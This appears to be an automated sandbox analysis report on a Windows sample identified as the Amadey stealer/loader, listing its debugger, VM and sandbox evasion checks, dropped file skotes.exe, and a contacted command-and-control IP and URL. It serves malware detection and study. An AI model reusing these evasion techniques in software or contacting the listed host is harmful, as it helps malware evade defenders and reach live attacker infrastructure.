Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BB7B5C second address: BB7B7B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB19901BD13h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BB7B7B second address: BB7B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Special instruction interceptor: First address: E6ECB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Special instruction interceptor: First address: 10379C9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Special instruction interceptor: First address: 1020BE5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Special instruction interceptor: First address: 1097F82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A3ECB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C079C9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BF0BE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C67F82 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Code function: 0_2_04D70770 rdtsc 0_2_04D70770
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 459 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3796 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3796 Thread sleep time: -76038s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5608 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5608 Thread sleep time: -78039s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6320 Thread sleep count: 459 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6320 Thread sleep time: -13770000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6540 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6320 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.3399818041.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000002.3400789012.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3400789012.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: FQSn6sSfgS.exe, 00000000.00000002.2200630132.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2231225967.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2263056068.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3399818041.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Code function: 0_2_04D70770 rdtsc 0_2_04D70770
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A0652B mov eax, dword ptr fs:[00000030h] 6_2_00A0652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A0A302 mov eax, dword ptr fs:[00000030h] 6_2_00A0A302
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: skotes.exe Binary or memory string: r=Program Manager
Source: FQSn6sSfgS.exe, 00000000.00000002.2200630132.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2231225967.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2263056068.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: r=Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009ED3E2 cpuid 6_2_009ED3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009ECBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_009ECBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009D65E0 LookupAccountNameA, 6_2_009D65E0

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys stealer DLL
Source: Yara match File source: 3.2.skotes.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FQSn6sSfgS.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3399736911.00000000009D1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2230041079.00000000009D1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2200211244.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1611798 Sample: FQSn6sSfgS.exe Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Antivirus detection for URL or domain 2->28 30 9 other signatures 2->30 6 FQSn6sSfgS.exe 5 2->6         started        10 skotes.exe 12 2->10         started        13 skotes.exe 2->13         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\skotes.exe, PE32 6->18 dropped 20 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 skotes.exe 6->15         started        22 185.215.113.43, 49983, 49984, 49985 WHOLESALECONNECTIONSNL Portugal 10->22 38 Hides threads from debuggers 10->38 40 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->40 42 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->42 file5 signatures6 process7 signatures8 44 Antivirus detection for dropped file 15->44 46 Multi AV Scanner detection for dropped file 15->46 48 Detected unpacking (changes PE section rights) 15->48 50 7 other signatures 15->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.43/Zu7JuNko/index.php false
    		high